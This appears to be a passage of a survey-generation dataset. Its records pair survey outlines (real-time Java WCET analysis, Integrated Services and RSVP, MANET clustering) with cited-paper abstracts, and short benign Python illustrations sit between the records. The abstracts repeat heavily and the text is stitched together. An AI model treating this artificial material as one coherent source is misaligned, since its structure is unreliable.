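# 10 iterations per entry), exit block C.  Decision variables are execution
# counts x_A, x_B, x_C; we maximise total cycles subject to flow constraints.
import numpy as np
from scipy.optimize import linprog  # assumes SciPy is installed

cycles = np.array([5.0, 12.0, 3.0])      # invented per-block costs for A, B, C

# Equality constraints: the entry and exit blocks execute exactly once.
A_eq = np.array([[1.0, 0.0, 0.0],
                 [0.0, 0.0, 1.0]])
b_eq = np.array([1.0, 1.0])

# Inequality constraint (loop bound): x_B - 10*x_A <= 0.
A_ub = np.array([[-10.0, 1.0, 0.0]])
b_ub = np.array([0.0])

# linprog minimises, so negate the objective to maximise total cycles.
res = linprog(c=-cycles, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq,
              bounds=[(0, None)] * 3, method="highs")
print("WCET bound:", -res.fun, "cycles")  # 5 + 10*12 + 3 = 128
```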
Title: A Survey of Worst-Case Execution Time Analysis for Real-Time Java
Section 1: Introduction
Description 1: This section introduces the importance of worst-case execution time (WCET) analysis in real-time systems and the current challenges faced by practitioners in the industry.
Section 2: The Challenge of WCET Analysis
Description 2: This section discusses why influential research on WCET analysis hasn't been widely adopted, including the complexities of modern CPU architectures.
Section 3: Implementation Difficulties
Description 3: This section provides details on the difficulties in implementing WCET analysis tools, highlighting issues at both hardware and software levels.
Section 4: Java as a Catalyst
Description 4: This section explains why Java has become a popular platform for real-time systems and outlines key events and innovations that have made real-time Java viable.
Section 5: Bytecode as an Intermediate Representation
Description 5: This section covers the proposal to use Java bytecode as an intermediate representation for WCET tools and discusses the challenges and initial research in this area.
Section 6: High-level Analysis for the Java Language
Description 6: This section examines research into high-level WCET analysis for Java, including techniques and tools that extend traditional compiler theory to Java.
Section 7: Low-level WCET Analysis for Java Bytecode
Description 7: This section delves into approaches for low-level WCET analysis of Java bytecode, focusing on frameworks that address bytecode portability and timing models.
Section 8: WCET Analysis for Java-specific Processors
Description 8: This section explores processor architectures designed specifically for real-time systems, such as the Java Optimized Processor (JOP), and their implications for WCET analysis.
Section 9: Other Work in WCET Analysis for Java
Description 9: This section presents additional work in WCET analysis for Java that does not fall into the main categories, including development environments and optimization frameworks.
Section 10: Conclusion
Description 10: This section summarizes the state of WCET analysis for Java, including open problems and future directions for research.
Integrated Services in the Internet Architecture: an Overview
15
--- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. > --- paper_title: Supporting real-time applications in an Integrated Services Packet Network: architecture and mechanism paper_content: This paper considers the support of real-time applications in an Integrated Services Packet Network (ISPN). We first review the characteristics of real-time applications. We observe that, contrary to the popular view that real-time applications necessarily require a fixed delay bound, some real-time applications are more flexible and can adapt to current network conditions. We then propose an ISPN architecture that supports two distinct kinds of real-time service: guaranteed service, which is the traditional form of real-time service discussed in most of the literature and involves pre-computed worst-case delay bounds, and predicted service which uses the measure performance of the network in computing delay bounds. We then propose a packet scheduling mechanism that can support both of these real-time services as well as accommodate datagram traffic. We also discuss two other aspects of an overall ISPN architecture: the service interface and the admission control criteria. --- paper_title: A Protocol for Packet Network Intercommunication paper_content: A protocol that supports the sharing of resources that exist in different packet switching networks is presented. The protocol provides for variation in individual network packet sizes, transmission failures, sequencing, flow control, end-to-end error checking, and the creation and destruction of logical process-to-process connections. Some implementation issues are considered, and problems such as internetwork routing, accounting, and timeouts are exposed. --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. --- paper_title: A Proposed Flow Specification paper_content: A flow specification (or "flow spec") is a data structure used by internetwork hosts to request special services of the internetwork, often guarantees about how the internetwork will handle some of the hosts' traffic. 
In the future, hosts are expected to have to request such services on behalf of distributed applications such as multimedia conferencing. --- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. > --- paper_title: Analysis and simulation of a fair queueing algorithm paper_content: We discuss gateway queueing algorithms and their role in controlling congestion in datagram networks. A fair queueing algorithm, based on an earlier suggestion by Nagle, is proposed. Analysis and simulations are used to compare this algorithm to other congestion control schemes. We find that fair queueing provides several important advantages over the usual first-come-first-serve queueing algorithm: fair allocation of bandwidth, lower delay for sources using less than their full share of bandwidth, and protection from ill-behaved sources. --- paper_title: A Scheme for Real-Time Channel Establishment in Wide-Area Networks paper_content: Multimedia communication involving digital audio and/or digital video has rather strict delay requirements. A real-time channel is defined as a simplex connection between a source and a destination characterized by parameters representing the performance requirements of the client. A study is made of the feasibility of providing real-time services on a packet-switched store-and-forward wide-area network with general topology. A description is given of a scheme for the establishment of channels with deterministic or statistical delay bounds, and the results of the simulation experiments run to evaluate it are presented. The results are judged encouraging: the approach satisfies the guarantees even in worst case situations, uses the network's resources to a fair extent, and efficiently handles channels with a variety of offered load and burstiness characteristics. Also, the packet transmission overhead is quite low, and the channel establishment overhead is small enough to be acceptable in most practical cases. > --- paper_title: RSVP: a new resource ReSerVation Protocol paper_content: A resource reservation protocol (RSVP), a flexible and scalable receiver-oriented simplex protocol, is described. RSVP provides receiver-initiated reservations to accommodate heterogeneity among receivers as well as dynamic membership changes; separates the filters from the reservation, thus allowing channel changing behavior; supports a dynamic and robust multipoint-to-multipoint communication model by taking a soft-state approach in maintaining resource reservations; and decouples the reservation and routing functions. A simple network configuration with five hosts connected by seven point-to-point links and three switches is presented to illustrate how RSVP works. Related work and unresolved issues are discussed. 
> --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. --- paper_title: The design philosophy of the DARPA Internet Protocols paper_content: The Internet protocol suite, TCP/IP, was first proposed fifteen years ago. It was developed by the Defense Advanced Research Projects Agency (DARPA), and has been used widely in military and commercial systems. While there have been papers and specifications that describe how the protocols work, it is sometimes difficult to deduce from these why the protocol is as it is. For example, the Internet protocol is based on a connectionless or datagram mode of service. The motivation for this has been greatly misunderstood. This paper attempts to capture some of the early reasoning which shaped the Internet protocols. ---
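Several of the abstracts above (the proposed flow specification and the guaranteed/predicted service work) rest on the idea that a source declares its traffic with a few parameters that the network can then police at admission and forwarding time. The sketch below shows a generic token-bucket check of the kind such a flow spec implies; the rate and depth values and the packet trace are invented for illustration and are not taken from the cited documents.

```python
# Illustrative token-bucket policer: a flow declaring rate r (bytes/s) and
# bucket depth b (bytes) conforms as long as each packet finds enough tokens.
class TokenBucket:
    def __init__(self, rate: float, depth: float):
        self.rate = rate          # token refill rate, bytes per second
        self.depth = depth        # maximum burst size, bytes
        self.tokens = depth       # bucket starts full
        self.last_time = 0.0

    def conforms(self, arrival_time: float, size: int) -> bool:
        """Refill tokens for the elapsed time, then try to admit the packet."""
        elapsed = arrival_time - self.last_time
        self.tokens = min(self.depth, self.tokens + elapsed * self.rate)
        self.last_time = arrival_time
        if size <= self.tokens:
            self.tokens -= size
            return True
        return False              # non-conforming: drop, mark, or delay

if __name__ == "__main__":
    bucket = TokenBucket(rate=1000.0, depth=1500.0)   # invented flow spec
    trace = [(0.0, 1500), (0.5, 1000), (1.0, 600), (3.0, 1500)]
    for t, size in trace:
        print(f"t={t:>4}s size={size:>5}B conforms={bucket.conforms(t, size)}")
```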
Title: Integrated Services in the Internet Architecture: an Overview
Section 1: Introduction
Description 1: Introduce the background of integrated services and the motivation for adapting Internet architecture to support real-time QoS.
Section 2: Elements of the Architecture
Description 2: Discuss the fundamental changes proposed to the Internet model to support integrated services, including the extended service model and reference implementation framework.
Section 3: Integrated Services Model
Description 3: Describe the IS model, including the types of services it offers, key assumptions, and the requirements for service commitments.
Section 4: Reference Implementation Framework
Description 4: Provide details about the proposed framework for implementing the IS model, including components like the packet scheduler, admission control, classifier, and reservation setup protocol.
Section 5: Quality of Service Requirements
Description 5: Explain the QoS requirements for different types of applications, focusing on the time-of-delivery of packets and the distinction between real-time and elastic applications.
Section 6: Resource-Sharing Requirements and Service Models
Description 6: Discuss the policy issues and service models for resource-sharing among multiple traffic classes and administrative entities, emphasizing the hierarchical link-sharing model.
Section 7: Packet Dropping
Description 7: Explore the concept of controlled packet dropping to manage QoS commitments, including preemptable and expendable packets.
Section 8: Usage Feedback
Description 8: Address the importance of usage feedback (accounting) mechanisms to prevent abuse of network resources.
Section 9: Reservation Model
Description 9: Describe the reservation model for negotiating QoS levels and the complexities involved in realistic scenarios.
Section 10: Traffic Control Mechanisms
Description 10: Provide an overview of the traffic control mechanisms available for packet scheduling, packet dropping, packet classification, and admission control.
Section 11: Applying the Mechanisms
Description 11: Detail how the aforementioned traffic control mechanisms can be applied to support the proposed services, with an example of the CSZ scheme.
Section 12: Reservation Setup Protocol
Description 12: Discuss the design and requirements of a reservation setup protocol in a multicast environment, introducing the RSVP protocol.
Section 13: RSVP Overview
Description 13: Give an overview of the RSVP protocol, including its approach to creating and maintaining distributed reservation states and its different reservation styles.
Section 14: Soft State
Description 14: Compare the hard state and soft state approaches to reservation setup and justify the choice of the soft state for RSVP.
Section 15: Routing and Reservations
Description 15: Examine the interaction between routing and reservation setup, addressing issues like route discovery, load-dependent routing, and route adaptation.
Survey of Clustering Schemes in Mobile Ad hoc Networks
12
--- paper_title: Scalable Routing Protocols for Mobile Ad Hoc Networks paper_content: The growing interest in mobile ad hoc network techniques has resulted in many routing protocol proposals. Scalability issues in ad hoc networks are attracting increasing attention these days. We survey the routing protocols that address scalability. The routing protocols included in the survey fall into three categories: flat routing protocols; hierarchical routing approaches; GPS augmented geographical routing schemes. The article compares the scalability properties and operational features of the protocols and discusses challenges in future routing protocol designs. --- paper_title: An Efficient Cluster-Based Routing Algorithm in Ad Hoc Networks with Unidirectional Links * paper_content: Mobile ad hoc networks are dynamically organized by a collection of wireless mobile nodes. The mobile nodes in ad hoc networks can move arbitrarily thus the topology of network changes dynamically. Due to the properties of communication medium in wireless networks, unidirectional links may exist between mobile nodes thus results in the difficulty of link utilization and routing. In this paper, we take the advantages of multi-hop acknowledgement and employ the clustering technique to design an efficient hybrid routing protocol in ad hoc networks with unidirectional links. Simulation results demonstrate the stability and efficiency of the proposed protocol. --- paper_title: Max-min d-cluster formation in wireless ad hoc networks paper_content: An ad hoc network may be logically represented as a set of clusters. The clusterheads form a d-hop dominating set. Each node is at most d hops from a clusterhead. Clusterheads form a virtual backbone and may be used to route packets for nodes in their cluster. Previous heuristics restricted themselves to 1-hop clusters. We show that the minimum d-hop dominating set problem is NP-complete. Then we present a heuristic to form d-clusters in a wireless ad hoc network. Nodes are assumed to have a non-deterministic mobility pattern. Clusters are formed by diffusing node identities along the wireless links. When the heuristic terminates, a node either becomes a clusterhead, or is at most d wireless hops away from its clusterhead. The value of d is a parameter of the heuristic. The heuristic can be run either at regular intervals, or whenever the network configuration changes. One of the features of the heuristic is that it tends to re-elect existing clusterheads even when the network configuration changes. This helps to reduce the communication overheads during transition from old clusterheads to new clusterheads. Also, there is a tendency to evenly distribute the mobile nodes among the clusterheads, and evently distribute the responsibility of acting as clusterheads among all nodes. Thus, the heuristic is fair and stable. Simulation experiments demonstrate that the proposed heuristic is better than the two earlier heuristics, namely the LCA and degree-based solutions. --- paper_title: Issues in scalable clustered network architecture for mobile ad hoc networks paper_content: As a large-scale, high-density multi-hop network becomes desirable in many applications, there exists a greater demand for scalable mobile ad hoc network (MANET) architecture. Due to the increased route length between two end nodes in a multi-hop MANET, the challenge is in the limited scalability despite the improved spatial diversity in a large network area. 
Common to most of existing approaches for a scalable MANET is the link cluster architecture (LCA), where mobile nodes are logically partitioned into groups, called clusters. Clustering algorithms select master nodes and maintain the cluster structure dynamically as nodes move. Routing protocols utilize the underlying cluster structure to maintain routing and location information in an efficient manner. This paper discusses the various issues in scalable clustered network architectures for MANETs. This includes a classification of link-clustered architectures, an overview of clustering algorithms focusing on master selection, and a survey of cluster-based routing protocols. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. --- paper_title: A survey on clustering algorithms for wireless sensor networks paper_content: The past few years have witnessed increased interest in the potential use of wireless sensor networks (WSNs) in applications such as disaster management, combat field reconnaissance, border protection and security surveillance. Sensors in these applications are expected to be remotely deployed in large numbers and to operate autonomously in unattended environments. To support scalability, nodes are often grouped into disjoint and mostly non-overlapping clusters. In this paper, we present a taxonomy and general classification of published clustering schemes. We survey different clustering algorithms for WSNs; highlighting their objectives, features, complexity, etc. We also compare of these clustering algorithms based on metrics such as convergence rate, cluster stability, cluster overlapping, location-awareness and support for node mobility. --- paper_title: Survey of clustering algorithms for MANET paper_content: Many clustering schemes have been proposed for ad hoc networks. A systematic classification of these clustering schemes enables one to better understand and make improvements. In mobile ad hoc networks, the movement of the network nodes may quickly change the topology resulting in the increase of the overhead message in topology maintenance. Protocols try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control protocol. The clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. A large variety of approaches for ad hoc clustering have been developed by researchers which focus on different performance metrics. This paper presents a survey of different clustering schemes. 
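The clustering abstracts above (the linked cluster architecture work and the degree-based heuristics referenced by the max-min d-cluster paper) build on simple one-hop election rules such as lowest identifier or highest degree in a neighbourhood. The sketch below implements that basic rule as a centralized greedy pass over an invented neighbour graph; the distributed protocols in these papers achieve the same effect through message exchange and add maintenance, tie-breaking and mobility handling on top.

```python
# Minimal one-hop clusterhead election over a static neighbour graph
# (invented topology).  criterion = "lowest_id" or "highest_degree".
neighbours = {
    1: {2, 3}, 2: {1, 3, 4}, 3: {1, 2}, 4: {2, 5, 6}, 5: {4, 6}, 6: {4, 5},
}

def elect_clusterheads(graph, criterion="lowest_id"):
    heads, covered = set(), set()
    if criterion == "lowest_id":
        order = sorted(graph)                                     # smaller id wins
    else:
        order = sorted(graph, key=lambda n: (-len(graph[n]), n))  # degree wins
    for node in order:
        if node not in covered:
            heads.add(node)                  # node becomes a clusterhead ...
            covered.add(node)
            covered.update(graph[node])      # ... and covers its 1-hop cluster
    return heads

print("lowest-ID heads:     ", elect_clusterheads(neighbours, "lowest_id"))
print("highest-degree heads:", elect_clusterheads(neighbours, "highest_degree"))
```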
--- paper_title: A Survey on One-Hop Clustering Algorithms in Mobile Ad Hoc Networks paper_content: Clustering in mobile ad hoc network (MANET) play a vital role in improving its basic network performance parameters like routing delay, bandwidth consumption and throughput. One-hop clustering scheme adopts the simple mechanism to make the logical partition of the dynamic network where the network topology changes constantly resulting an unstable clustering. This paper makes a comprehensive survey of some bench-mark one-hop clustering algorithms to understand the research trends in this area. The literature provides the logic of cluster formation for different algorithms in achieving a linked cluster architecture and an intensive simulation survey of their performance on the cluster maintenance aspects such as cluster density, frequency of cluster reelection, frequency of cluster changes by the nodes and the granularity of cluster heads. This paper should facilitate the researchers as well as practitioners in choosing a suitable clustering algorithm on the basis of their formation and maintenance overhead, before any routing scheme is adopted in the mobile ad hoc network. --- paper_title: A Distributed Weighted Cluster Based Routing Protocol for MANETs paper_content: MANETs or Mobile ad-hoc networks are a form of wireless networks which do not require a base station for providing network connectivity. Mobile ad-hoc networks have many characteristics which distinguish them from other wireless networks which makes routing in mobile ad-hoc networks a challenging task. Cluster based routing scheme is one of the routing schemes for MANETs in which various clusters of mobile nodes are formed with each cluster having its own clusterhead which are responsible for routing between clusters. In this project we have designed an implementation of Distributed Weighted Clustering Algorithm. This approach is based on combined weight metric that takes into account several system parameters like the node degree, transmission range, energy and mobility of the nodes. After implementation we have evaluated the performance of our cluster based routing scheme in various network situations. --- paper_title: A design concept for reliable mobile radio networks with frequency hopping signaling paper_content: The design of a packet radio network must reflect the operational requirements and environmental constraints to which it is subject. In this paper, we outline those features that distinguish the High Frequency (HF) Intra Task Force (ITF) Network from other packet radio networks, and we present a design concept for this network that encompasses organizational structure, waveform design, and channel access. Network survivability is achieved through the use of distributed network control and frequency hopping spread-spectrum signaling. We demonstrate how the execution of the fully distributed Linked Cluster Algorithm can enable a network to reconfigure itself when it is affected by connectivity changes such as those resulting from jamming. Additional resistance against jamming is provided by frequency hopping, which leads naturally to the use of code division mutiple access (CDMA) techniques that permit the simultaneous successful transmission by several users. Distributed algorithms that exploit CDMA properties have been developed to schedule contention-free transmissions for much of the channel access in this network. 
Contention-based channel access protocols can also be implemented in conjunction with the Linked Cluster network structure. The design concept presented in this paper provides a high degree of survivability and flexibility, to accommodate changing environmental conditions and user demands. --- paper_title: WCA: A Weighted Clustering Algorithm for Mobile Ad Hoc Networks paper_content: In this paper, we propose an on-demand distributed clustering algorithm for multi-hop packet radio networks. These types of networks, also known as i>ad hoc networks, are dynamic in nature due to the mobility of nodes. The association and dissociation of nodes to and from i>clusters perturb the stability of the network topology, and hence a reconfiguration of the system is often unavoidable. However, it is vital to keep the topology stable as long as possible. The i>clusterheads, form a i>dominant set in the network, determine the topology and its stability. The proposed weight-based distributed clustering algorithm takes into consideration the ideal degree, transmission power, mobility, and battery power of mobile nodes. The time required to identify the clusterheads depends on the diameter of the underlying graph. We try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control (MAC) protocol. The non-periodic procedure for clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. The clusterheads, operating in “dual" power mode, connects the clusters which help in routing messages from a node to any other node. We observe a trade-off between the uniformity of the load handled by the clusterheads and the connectivity of the network. Simulation experiments are conducted to evaluate the performance of our algorithm in terms of the number of clusterheads, i>reaffiliation frequency, and dominant set updates. Results show that our algorithm performs better than existing ones and is also tunable to different kinds of network conditions. --- paper_title: Distributed clustering for ad hoc networks paper_content: A Distributed Clustering Algorithm (DCA) and a Distributed Mobility-Adaptive Clustering (DMAC) algorithm are presented that partition the nodes of a fully mobile network: (ad hoc network) into clusters, this giving the network a hierarchical organization. Nodes are grouped by following a new weight-based criterion that allows the choice of the nodes that coordinate the clustering process based on node mobility-rebated parameters. The DCA is suitable for clustering "quasistatic" ad hoc networks. It is easy to implement and its time complexity is proven to be bounded by a network parameter that depends on the topology of the network rather than on its size, i.e., the invariant number of the network nodes. The DMAC algorithm adapts to the changes in the network topology due to the mobility of the nodes, and it is thus suitable for any mobile environment. Both algorithms are executed at each node with the sole knowledge of the identity of the one hop neighbors, and induce on the network the same clustering structure. --- paper_title: A Distributed Weighted Clustering Algorithm for Mobile Ad Hoc Networks paper_content: Clustering has been proven to support quality of services effectively in a multi-hop network. 
In order to achieve good performance in a mobile ad hoc network whose topology changes dynamically, any clustering algorithm should operate with minimum clustering maintenance overhead and preserve current cluster structure as much as possible. In this paper, we propose a clustering algorithm, namely a distributed weighted clustering algorithm. The goals of the algorithm are maintaining stable clustering structure, minimizing the overhead for the clustering set up and maintenance, maximizing lifespan of mobile nodes in the system, and achieving good end-to-end performance. DWCA chooses locally optimal clusterheads and incorporates power management at the clusterheads. Results obtained from simulations proved that the proposed algorithm achieves the goals. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. --- paper_title: A survey on clustering algorithms for wireless sensor networks paper_content: The past few years have witnessed increased interest in the potential use of wireless sensor networks (WSNs) in applications such as disaster management, combat field reconnaissance, border protection and security surveillance. Sensors in these applications are expected to be remotely deployed in large numbers and to operate autonomously in unattended environments. To support scalability, nodes are often grouped into disjoint and mostly non-overlapping clusters. In this paper, we present a taxonomy and general classification of published clustering schemes. We survey different clustering algorithms for WSNs; highlighting their objectives, features, complexity, etc. We also compare of these clustering algorithms based on metrics such as convergence rate, cluster stability, cluster overlapping, location-awareness and support for node mobility. --- paper_title: Survey of clustering algorithms for MANET paper_content: Many clustering schemes have been proposed for ad hoc networks. A systematic classification of these clustering schemes enables one to better understand and make improvements. In mobile ad hoc networks, the movement of the network nodes may quickly change the topology resulting in the increase of the overhead message in topology maintenance. Protocols try to keep the number of nodes in a cluster around a pre-defined threshold to facilitate the optimal operation of the medium access control protocol. The clusterhead election is invoked on-demand, and is aimed to reduce the computation and communication costs. A large variety of approaches for ad hoc clustering have been developed by researchers which focus on different performance metrics. This paper presents a survey of different clustering schemes. 
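The WCA and DWCA abstracts above elect clusterheads by a combined weight over node degree, transmission load, mobility and battery state. The sketch below computes such a weight and picks the minimum-weight node; the weighting factors, the per-node values and the convention that lower weight is better are illustrative assumptions rather than the exact formulation of either paper.

```python
# Illustrative WCA-style combined weight:
#   W = w1*degree_difference + w2*sum_of_distances + w3*mobility + w4*battery_use
# The node with the smallest W in its neighbourhood is elected clusterhead.
from dataclasses import dataclass

@dataclass
class Node:
    node_id: int
    degree: int            # current number of neighbours
    sum_distances: float   # sum of distances to neighbours (transmission load)
    mobility: float        # average speed, m/s
    battery_used: float    # cumulative time already spent as clusterhead, s

IDEAL_DEGREE = 3                         # assumed ideal cluster size
WEIGHTS = (0.7, 0.2, 0.05, 0.05)         # invented factors, chosen to sum to 1

def combined_weight(n: Node) -> float:
    w1, w2, w3, w4 = WEIGHTS
    degree_diff = abs(n.degree - IDEAL_DEGREE)
    return (w1 * degree_diff + w2 * n.sum_distances
            + w3 * n.mobility + w4 * n.battery_used)

nodes = [Node(1, 2, 45.0, 1.2, 10.0), Node(2, 3, 60.0, 0.4, 30.0),
         Node(3, 5, 80.0, 2.5, 5.0)]
head = min(nodes, key=combined_weight)   # lowest combined weight wins
for n in nodes:
    print(f"node {n.node_id}: weight = {combined_weight(n):.2f}")
print("elected clusterhead:", head.node_id)
```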
--- paper_title: A design concept for reliable mobile radio networks with frequency hopping signaling paper_content: The design of a packet radio network must reflect the operational requirements and environmental constraints to which it is subject. In this paper, we outline those features that distinguish the High Frequency (HF) Intra Task Force (ITF) Network from other packet radio networks, and we present a design concept for this network that encompasses organizational structure, waveform design, and channel access. Network survivability is achieved through the use of distributed network control and frequency hopping spread-spectrum signaling. We demonstrate how the execution of the fully distributed Linked Cluster Algorithm can enable a network to reconfigure itself when it is affected by connectivity changes such as those resulting from jamming. Additional resistance against jamming is provided by frequency hopping, which leads naturally to the use of code division mutiple access (CDMA) techniques that permit the simultaneous successful transmission by several users. Distributed algorithms that exploit CDMA properties have been developed to schedule contention-free transmissions for much of the channel access in this network. Contention-based channel access protocols can also be implemented in conjunction with the Linked Cluster network structure. The design concept presented in this paper provides a high degree of survivability and flexibility, to accommodate changing environmental conditions and user demands. --- paper_title: Adaptive Clustering for Mobile Wireless Networks paper_content: This paper describes a self-organizing, multihop, mobile radio network which relies on a code-division access scheme for multimedia support. In the proposed network architecture, nodes are organized into nonoverlapping clusters. The clusters are independently controlled, and are dynamically reconfigured as the nodes move. This network architecture has three main advantages. First, it provides spatial reuse of the bandwidth due to node clustering. Second, bandwidth can be shared or reserved in a controlled fashion in each cluster. Finally, the cluster algorithm is robust in the face of topological changes caused by node motion, node failure, and node insertion/removal. Simulation shows that this architecture provides an efficient, stable infrastructure for the integration of different types of traffic in a dynamic radio network. --- paper_title: Connectivity based k-hop clustering in wireless networks paper_content: In this paper we describe several new clustering algorithms for nodes in a mobile ad hoc network. We propose to combine two known approaches into a single clustering algorithm which considers connectivity as a primary criterion and lower ID as secondary criterion for selecting cluster heads. The goal is to minimize the number of clusters, which results in dominating sets of smaller sizes (this is important for applications in broadcasting and Bluetooth formation). We also describe algorithms for modifying cluster structure in the presence of topological changes. Next, we generalize the cluster definition so that a cluster contains all nodes that are at a distance of at most k hops from the cluster head. The efficiency of four clustering algorithms (k-lowestID and k-CONID, k=1 and k=2) is tested by measuring the average number of created clusters, the number of border nodes, and the cluster size in random unit graphs. 
The most interesting experimental result is stability of the ratio of the sum of CHs and border nodes in the set. It was constantly 60-70% for 1-lowestID and 46-56% for 1-ConID, for any value of n (number of nodes) and d (average node degree). Similar conclusions and similar number were obtained for k=2. We also proposed a unified framework for most existing and new clustering algorithms where a properly defined weight at each node is the only difference in the algorithm. Finally, we propose a framework for generating random unit graphs with obstacles. --- paper_title: Max-min d-cluster formation in wireless ad hoc networks paper_content: An ad hoc network may be logically represented as a set of clusters. The clusterheads form a d-hop dominating set. Each node is at most d hops from a clusterhead. Clusterheads form a virtual backbone and may be used to route packets for nodes in their cluster. Previous heuristics restricted themselves to 1-hop clusters. We show that the minimum d-hop dominating set problem is NP-complete. Then we present a heuristic to form d-clusters in a wireless ad hoc network. Nodes are assumed to have a non-deterministic mobility pattern. Clusters are formed by diffusing node identities along the wireless links. When the heuristic terminates, a node either becomes a clusterhead, or is at most d wireless hops away from its clusterhead. The value of d is a parameter of the heuristic. The heuristic can be run either at regular intervals, or whenever the network configuration changes. One of the features of the heuristic is that it tends to re-elect existing clusterheads even when the network configuration changes. This helps to reduce the communication overheads during transition from old clusterheads to new clusterheads. Also, there is a tendency to evenly distribute the mobile nodes among the clusterheads, and evently distribute the responsibility of acting as clusterheads among all nodes. Thus, the heuristic is fair and stable. Simulation experiments demonstrate that the proposed heuristic is better than the two earlier heuristics, namely the LCA and degree-based solutions. --- paper_title: 3hBAC (3-hop between adjacent clusterheads): a novel non-overlapping clustering algorithm for mobile ad hoc networks paper_content: The clustering protocol of an ad hoc network is always with interest. In this paper, we present a novel non-overlapping clustering algorithm, 3-hop between adjacent clusterheads (3hBAC), which can decrease the number of clusters without loss of connection information. In the cluster maintenance phase, we combine 3hBAC with least cluster change (LCC) algorithm to further decrease the cluster change and to extend average clusterhead time and membership time. The performances of 3hBAC are compared with highest-connectivity clustering (HCC), random competition-based clustering (RCC) in terms of average number of clusters, average clusterhead time and average membership time. 3hBAC outperforms HCC and RCC in both the cluster formation and maintenance phase. --- paper_title: MPBC: A Mobility Prediction-Based Clustering Scheme for Ad Hoc Networks paper_content: Creating a hierarchical structure by clustering has been considered an effective method to improve the performance of ad hoc networks, such as scalability and stability. This is particularly important for networks with mobile nodes, where the mobility can cause randomly and dynamically changed network topology. 
In this paper, we propose a mobility prediction-based clustering (MPBC) scheme for ad hoc networks with high mobility nodes, where a node may change the associated cluster head (CH) several times during the lifetime of its connection. The proposed clustering scheme includes an initial clustering stage and a cluster maintaining stage. The Doppler shifts associated with periodically exchanged Hello packets between neighboring nodes are used to estimate their relative speeds, and the estimation results are utilized as the basic information in MPBC. In the initial clustering stage, the nodes having the smallest relative mobility in their neighborhoods are selected as the CHs. In the cluster maintaining stage, mobility prediction strategies are introduced to handle the various problems caused by node movements, such as possible association losses to current CHs and CH role changes, for extending the connection lifetime and providing more stable clusters. An analytical model is developed to find the upper and lower bounds of the average connection lifetime and to find the average association change rate of MPBC. Numerical results verify the analysis and further show that the proposed clustering scheme outperforms the existing clustering schemes in ad hoc networks with high mobility nodes. --- paper_title: Clustering in mobile ad hoc networks through neighborhood stability-based mobility prediction paper_content: Clustering for mobile ad hoc networks (MANETs) offers a kind of hierarchical organization by partitioning mobile hosts into disjoint groups of hosts (clusters). However, the problem of changing topology is recurring and the main challenge in this technique is to build stable clusters despite the host mobility. In this paper, we present a novel clustering algorithm, which guarantees longer lifetime of the clustering structure in comparison to other techniques proposed in the literature. The basis of our algorithm is a scheme that accurately predicts the mobility of each mobile host based on the stability of its neighborhood (i.e., how different is its neighborhood over time). This information is then used for creating each cluster from hosts that will remain neighbors for sufficiently long time, ensuring the formation of clusters that are highly resistant to host mobility. For estimating the future host mobility, we use provably good information theoretic techniques, which allow on-line learning of a reliable probabilistic model for the existing host mobility. --- paper_title: A flexible weighted clustering algorithm based on battery power for Mobile Ad hoc Networks paper_content: Mobile Ad hoc Networks (MANET) consist of a number of wireless hosts that communicate with each other through multi-hop wireless links in the absence of fixed infrastructure. The previous research on mobile ad-hoc network suggested the use of clustering algorithm because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. In this paper, we propose that the 